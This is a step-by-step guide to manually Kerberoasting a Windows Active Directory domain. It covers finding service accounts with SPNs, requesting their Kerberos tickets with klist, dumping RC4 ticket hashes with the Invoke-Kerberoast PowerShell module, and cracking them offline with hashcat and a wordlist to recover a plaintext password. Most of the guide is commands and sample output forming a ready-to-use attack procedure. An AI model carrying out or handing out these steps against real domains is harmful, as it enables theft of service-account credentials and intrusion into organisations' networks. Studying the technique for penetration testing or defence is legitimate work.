How to Manually Kerberoast with PowerShell
++++++++++++++++++++++++++++++++++++++++++
Short guide by Ville Koch (27.07.2018)
++++++++++++++++++++++++++++++++++++++++++

1) First you have to be on a domain joined Windows system logged in with a domain user (or having taken over an active session of such a user)
2) Now search for Domain users with configured SPNs, for example with following PowerShell Script: https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Find-PSServiceAccounts
3) For all these SPNs you could now get a Kerberos Ticket, but you will be only interested in the ones registered on domain users instead of hosts! (check https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/ for Details)
4) To get the Kerberos Ticket, open cmd.exe --> "klist get <SPN>" (SPN obtained in step 3)

	Example:
	C:\>klist get HTTP/SA-SPS
	Current LogonId is 0:0x29ca8e9
	A ticket to HTTP/SA-SPS has been retrieved successfully.

	Cached Tickets: (4)
	#1> Client: domainuser @ CONTOSO.NET
        Server: HTTP/SA-SPS @ CONTOSO.NET
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 7/27/2018 14:56:45 (local)
        End Time:   7/28/2018 0:56:45 (local)
        Renew Time: 8/3/2018 14:56:14 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called: SS0001234.contoso.net
	...

5) Once you find one which has it's Encryption Type set to "RC4-HMAC" you can get the ticket hash with another PowerShell Script, e.g. https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1
   Command: Get-DomainSPNTicket -SPN "<SPN>" -OutputFormat Hashcat
   
   Example:
   PS U:\> Get-DomainSPNTicket -SPN "HTTP/SA-SPS" -OutputFormat Hashcat


	TicketByteHexStream  : 
	Hash                 : $krb5tgs$23$*UNKNOWN$UNKNOWN$HTTP/SA-SPS*$A4CBB9C21C71FFB4B59C8[REDACTED]EA5EBE6AF8B2E67B295311EDD4FF
	SamAccountName       : UNKNOWN
	DistinguishedName    : UNKNOWN
	ServicePrincipalName : HTTP/SA-SPS
   
   (Example hash was reduced from original, is usually longer)
   
6) Now take this hash (make sure to remove all the formatting!) and use hashcat to crack it
   This example uses a wordlist (rockyou.txt) and saves the output to a text file called crackedpw.txt:
   
   hashcat -m 13100 -a 0 -o crackedpw.txt hashcat_kticket.txt rockyou.txt  --force

	Dictionary cache built:
	* Filename..: rockyou.txt
	* Passwords.: 14344392
	* Bytes.....: 139921507
	* Keyspace..: 14344385
	* Runtime...: 3 secs

													 
	Session..........: hashcat
	Status...........: Cracked
	Hash.Type........: Kerberos 5 TGS-REP etype 23
	Hash.Target......: $krb5tgs$23$*weaksvc$winlab.net$http/win7client*$ca...3d5502
	Time.Started.....: Fri Jul 27 08:14:48 2018 (0 secs)
	Time.Estimated...: Fri Jul 27 08:14:48 2018 (0 secs)
	Guess.Base.......: File (rockyou.txt)
	Guess.Queue......: 1/1 (100.00%)
	Speed.Dev.#1.....:   216.1 kH/s (8.99ms) @ Accel:20 Loops:1 Thr:64 Vec:8
	Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
	Progress.........: 10240/14344385 (0.07%)
	Rejected.........: 0/10240 (0.00%)
	Restore.Point....: 7680/14344385 (0.05%)
	Candidates.#1....: somebody -> 1asshole
	HWMon.Dev.#1.....: N/A

	Started: Fri Jul 27 08:14:44 2018
	Stopped: Fri Jul 27 08:14:49 2018
	
7) Now you have (if it worked and the password was not too complex ;) ) the password in plaintext:
	root@kali:~# cat crackedpw.txt 
	$krb5tgs$23$*UNKNOWN$UNKNOWN$HTTP/SA-SPS*$255649a...2:P@ssw0rd
